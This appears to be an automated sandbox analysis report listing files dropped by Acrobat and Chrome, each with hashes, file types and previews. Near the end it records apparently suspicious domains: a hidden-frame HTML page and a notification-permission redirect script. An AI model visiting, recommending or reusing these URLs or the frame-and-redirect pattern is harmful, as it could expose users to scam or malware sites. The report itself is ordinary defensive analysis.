                                                                                                          SHA1:7C67D1B68E19A755034CA87F8ACFBA6282FB007D
                                                                                                          SHA-256:81625754B055EFBA4C03B961D638E937FA852CE99DD70F20C3211398B698EEFF
                                                                                                          SHA-512:4EA52CD7FFB1396F2FC42DC33F7D8A537F96757E008F84AC5E109BB529FCABB85A206CDF7AF7141877EEB920514265CDE0B6E81F65FAF72D9599DB6D9C1C4BE0
                                                                                                          Malicious:false
                                                                                                          Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1736161585000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"7c2ad79e375e3ea39f82a389e8a5841f","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696420882000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12288
                                                                                                          Entropy (8bit):1.1882048310693913
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TGufl2GL7msEHUUUUUUUUASvR9H9vxFGiDIAEkGVvpi:lNVmswUUUUUUUUA+FGSIte
                                                                                                          MD5:E73A6FD2A0419612CBC69A33241D8282
                                                                                                          SHA1:BB58A9E5B35FDC1F49D1F088F9A0BA0795957C28
                                                                                                          SHA-256:C30C993C2C6ECED31BCDC1DD139DBF3E06FBB4774366DCC2974AFE7820ED830E
                                                                                                          SHA-512:344B995AF9C62D4512BF0F4DF1BC4BB8ABF30B27D1737730896E69FC12B099008C0BB1B85237A939D7516B1DADE166E9B725022FB7B731EEAEE7B452CAF1D2B7
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:SQLite Rollback Journal
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8720
                                                                                                          Entropy (8bit):1.6083709202564072
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7MLKUUUUUUUUUUyvR9H9vxFGiDIAEkGVvCqFl2GL7msn:75UUUUUUUUUUeFGSItMKVmsn
                                                                                                          MD5:95CFE7FF1CBAB972562B338420501E1D
                                                                                                          SHA1:3142471522F80F5556107999F56554CA8F33CD75
                                                                                                          SHA-256:613789FF0D84A665F320EF3EF43B9394C9DDB7BF5D40503463193B6E31335E10
                                                                                                          SHA-512:2311BCAF193BEF1DA4CA174D0C06AF7EF5653397C0F385CFC08FAFB91CAE7997B3A89C23B84C8E4DCF4AF468CDF3A3F24CA4EEDEAC3A1015B9C25E55C3E9621A
                                                                                                          Malicious:false
                                                                                                          Preview:.... .c.....B..>......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66726
                                                                                                          Entropy (8bit):5.392739213842091
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgJsAbf2zWFmuIStzzehy8GQ4Yyu:6a6TZ44ADEiAbf2zotzQGzK
                                                                                                          MD5:0543D6878A1228BEECB3D4EB8B51735E
                                                                                                          SHA1:9164F44F18DF066BCFFBCA80CC453A8BE93EDAD2
                                                                                                          SHA-256:C6917B16A25B8BA7D032C1A5B6C2DBBD0BFC09D9CED72F943F077FF7CDF378CD
                                                                                                          SHA-512:46604BA37E0D2F3FBD5BCDBA9372F1F97C67CE26CA30996A3C4AE31FA2DD60161219491BE2C50EAA7A42BA765272B85D8543650117C746E65CDAC8251E010BFD
                                                                                                          Malicious:false
                                                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):246
                                                                                                          Entropy (8bit):3.5105370742203172
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88bClSwlYH:Qw946cPbiOxDlbYnuRKTUlYH
                                                                                                          MD5:3AC18DC01F9EBF32490115FD1B4D0D26
                                                                                                          SHA1:A5C051C368A0900BC9611BC539B20FC303034B58
                                                                                                          SHA-256:45E9F48FB126D33764E7392EADC3F394515006E6631039058CBA21646D76CA16
                                                                                                          SHA-512:430E4E0E8203D88F9CACEDF98A12AAC53F2485F6068FDE34EDF85540568B07E49789A5BAC3F7B36B9DD2C7A76134AF7E02FE9B3FE5053ED77A5153E6E0EDA633
                                                                                                          Malicious:false
                                                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.0.1./.2.0.2.5. . .0.6.:.0.6.:.3.0. .=.=.=.....
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:ASCII text, with very long lines (393)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16525
                                                                                                          Entropy (8bit):5.345946398610936
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                                          MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                                          SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                                          SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                                          SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                                          Malicious:false
                                                                                                          Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15114
                                                                                                          Entropy (8bit):5.336117584387007
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:7GORcRdRURORnwhow/w8wmwUxwewvw5w+wGylyBy3yrdIdUdFdKddKD1DxDXcN2U:7HSv6AZIoyzLRxDsSJVGsOcuKvUuR1jU
                                                                                                          MD5:218851234B7400F86AB9F398EBA90246
                                                                                                          SHA1:D117D2B11A09F783A2D2460355522F53F64CDB49
                                                                                                          SHA-256:F0AF6E160E2A46CDA4685E99B5F746FEBDE74B1274B3D7D5D8F6B0E94B39DF6A
                                                                                                          SHA-512:A7B0810A43D237AE5DDB4FAD3B10F486ACB42C8603D7DB010009144484D0FD23D3F3183D236643444785E78EE12FE98777D53FE51F287E892908547DAAAFC708
                                                                                                          Malicious:false
                                                                                                          Preview:SessionID=3064ff41-d4ca-42a0-bde6-676ce7b396b0.1736161585141 Timestamp=2025-01-06T06:06:25:141-0500 ThreadID=7748 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=3064ff41-d4ca-42a0-bde6-676ce7b396b0.1736161585141 Timestamp=2025-01-06T06:06:25:142-0500 ThreadID=7748 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=3064ff41-d4ca-42a0-bde6-676ce7b396b0.1736161585141 Timestamp=2025-01-06T06:06:25:142-0500 ThreadID=7748 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=3064ff41-d4ca-42a0-bde6-676ce7b396b0.1736161585141 Timestamp=2025-01-06T06:06:25:142-0500 ThreadID=7748 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=3064ff41-d4ca-42a0-bde6-676ce7b396b0.1736161585141 Timestamp=2025-01-06T06:06:25:142-0500 ThreadID=7748 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):29752
                                                                                                          Entropy (8bit):5.395627910754779
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2ro:0
                                                                                                          MD5:6F4F3EBEB03330091A386F17D9C5467C
                                                                                                          SHA1:070C4D4ECB0A12ADC4981885886A237BA0725AC0
                                                                                                          SHA-256:FDA8106599FFA62A9C37D48847238868B422C24AB62E69A01A4B30A0415DDA71
                                                                                                          SHA-512:38EF3BB11B1D59FB53B76F113F8540D0F543A24256F0713FD2FC7A6281EDBEB4CCF514D5EE8297215DCC34B2193EBCDB375EF7DF3E21092E4EBEA000D6176F25
                                                                                                          Malicious:false
                                                                                                          Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                          Category:dropped
                                                                                                          Size (bytes):386528
                                                                                                          Entropy (8bit):7.9736851559892425
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                          Malicious:false
                                                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1419751
                                                                                                          Entropy (8bit):7.976496077007677
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:/xA7ouWLaGZ7wYIGNPJxdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:JVuWLaGZ7wZGV3mlind9i4ufFXpAXkrj
                                                                                                          MD5:CB3005DBED13F33D7F7EA7E227F8A141
                                                                                                          SHA1:15E1DC8FB74151572E1CF67AD62F534A5C1E2214
                                                                                                          SHA-256:64AE1E5231E631117B7D69BB0EB4369EC2153376C07FF6CA8A0A138051B65FC5
                                                                                                          SHA-512:7D97AA765E55F1F3CA189F353FC78F9B23C262383A2710CC1FF8A8F2A35EA7B1E1DB2B78478D952B4EEE59BF2258E77114042EF219F575F8A5D722FFD85FF295
                                                                                                          Malicious:false
                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1407294
                                                                                                          Entropy (8bit):7.97605879016224
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                          Malicious:false
                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                          Category:dropped
                                                                                                          Size (bytes):758601
                                                                                                          Entropy (8bit):7.98639316555857
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                          MD5:3A49135134665364308390AC398006F1
                                                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                          Malicious:false
                                                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):313
                                                                                                          Entropy (8bit):5.08424792488246
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:q4I3iBzfAbpliLtRxBrQrF90wEQpgHXyeAmHcHYAdYb:MoUyLPxBrQYwvpg3yeAp5Yb
                                                                                                          MD5:83030AD593582FE801A788FE67DCE448
                                                                                                          SHA1:B1EF12FB1B6E26C5CBD2CB053C0A8EFCA1E65A51
                                                                                                          SHA-256:23E7F7C77B1C7791C400DB33DC23FF8CE48D5C41871498BA87B32601289D2A46
                                                                                                          SHA-512:AD8FA04523EE57E8B92106989076997614DAF13257F524481CEDFB5F8C6D6B093CC0EB6DBCF957E4A3906EF24A5CB9432847EF184D0B01846316804F33D30E65
                                                                                                          Malicious:false
                                                                                                          URL:https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=
                                                                                                          Preview:<html>..<meta http-equiv="X-UA-Compatible" content="IE=9">..<meta name="viewport" content="width=device-width, initial-scale=1.0"/>..<head>..<frameset rows="*,2" frameborder="YES" border="6" framespacing="0">..<frame frameborder="0" src="/includes/3z6r2I6C42020J" scrolling="yes" noresize="1" />..</head>..</html>
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (58038), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58038
                                                                                                          Entropy (8bit):5.448291099035219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:6h2PHFGl3+tUfL0U4XMPa8AfyDI8k4oGrRqk/+dLQ6QmV:6hCHIlpL34I88hrRqk/5e
                                                                                                          MD5:E30AA1C7E2E30E9983180DFAF2D4C5D3
                                                                                                          SHA1:B00507E6B353C718AB14283E3AC4778523D1B1D3
                                                                                                          SHA-256:302840C70F64357290311C1C1605A9492C8A44C8D5E0A1A04693BADFBB15CF04
                                                                                                          SHA-512:A256E64A8A8BBA7E86C25388CE3C7DEF02CA8D7960C3FFDFAA40B8218A65E67ADBE9B3ABB1124651E43F6BB91EBB2CAF1E7F69C0918BECFC1A26C45F37F0B3AB
                                                                                                          Malicious:false
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[14964],{74801:function(n,e,t){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[landingName]/[configId]/[[...slug]]",function(){return t(19916)}])},19916:function(n,e,t){"use strict";t.r(e),t.d(e,{__N_SSG:function(){return we},default:function(){return xe}});var i=t(56753),o=t(97897),a=t(25237),r=t.n(a),u=t(53444),s=t(12139),c=function(){var n=(0,s.useState)(!1),e=n[0],t=n[1];return(0,s.useEffect)((function(){t(function(){var n=window.navigator.userAgent;return/iPad|iPhone|iPod/.test(n)}())}),[]),{isIos:e}},l=t(17969),d=t(71961),f=t(21818),p=t(72181),v=t(72499),m=t(48430),b=function(n){var e=n.zones,t=(0,v.E)().getExitUrl,i=(0,m.a)(e).mainExit,o=function(){var n=t({zoneType:f.w.mainExit,zoneDetails:null===i||void 0===i?void 0:i.zonesDetails,tab:"current"});(0,d.cM)("[CheckPermission]: redirect to:",n),(0,d.PT)(),l.V8&&(0,p.Sj)({currentTabUrl:n})};return(0,s.useEffect)((function(){if((0,d.bP)("CheckPermission"),"Notification"in windo
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (58038), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):58038
                                                                                                          Entropy (8bit):5.448291099035219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:6h2PHFGl3+tUfL0U4XMPa8AfyDI8k4oGrRqk/+dLQ6QmV:6hCHIlpL34I88hrRqk/5e
                                                                                                          MD5:E30AA1C7E2E30E9983180DFAF2D4C5D3
                                                                                                          SHA1:B00507E6B353C718AB14283E3AC4778523D1B1D3
                                                                                                          SHA-256:302840C70F64357290311C1C1605A9492C8A44C8D5E0A1A04693BADFBB15CF04
                                                                                                          SHA-512:A256E64A8A8BBA7E86C25388CE3C7DEF02CA8D7960C3FFDFAA40B8218A65E67ADBE9B3ABB1124651E43F6BB91EBB2CAF1E7F69C0918BECFC1A26C45F37F0B3AB
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.js
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[14964],{74801:function(n,e,t){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[landingName]/[configId]/[[...slug]]",function(){return t(19916)}])},19916:function(n,e,t){"use strict";t.r(e),t.d(e,{__N_SSG:function(){return we},default:function(){return xe}});var i=t(56753),o=t(97897),a=t(25237),r=t.n(a),u=t(53444),s=t(12139),c=function(){var n=(0,s.useState)(!1),e=n[0],t=n[1];return(0,s.useEffect)((function(){t(function(){var n=window.navigator.userAgent;return/iPad|iPhone|iPod/.test(n)}())}),[]),{isIos:e}},l=t(17969),d=t(71961),f=t(21818),p=t(72181),v=t(72499),m=t(48430),b=function(n){var e=n.zones,t=(0,v.E)().getExitUrl,i=(0,m.a)(e).mainExit,o=function(){var n=t({zoneType:f.w.mainExit,zoneDetails:null===i||void 0===i?void 0:i.zonesDetails,tab:"current"});(0,d.cM)("[CheckPermission]: redirect to:",n),(0,d.PT)(),l.V8&&(0,p.Sj)({currentTabUrl:n})};return(0,s.useEffect)((function(){if((0,d.bP)("CheckPermission"),"Notification"in windo
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (388), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):388
                                                                                                          Entropy (8bit):5.853471974611916
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrgSCSaeD9lLjHMlONoiJxHHNaSWoYsr9xQRiOZBIdiQLf:+dbjXC7ehlLDMcCCGy3QUdiQT
                                                                                                          MD5:3428A745D1966D35F5B166E21104160B
                                                                                                          SHA1:5AA78D89BD26E8E5DD77889CBC4D4734DA8F9176
                                                                                                          SHA-256:4E33C96E78A9108E78BB9064FCA8ECE4C2AFA2F63C10BDF5DFCDEB34AF08967A
                                                                                                          SHA-512:892412A5C32AF36AB0511CF9FB2DDF61CE3C95FBB0A5F6598E8EF4E33B653DAEA52F527903572ACCA6A988BC979E8E3D8233FD67946082CCF66159F1FBFCDF02
                                                                                                          Malicious:false
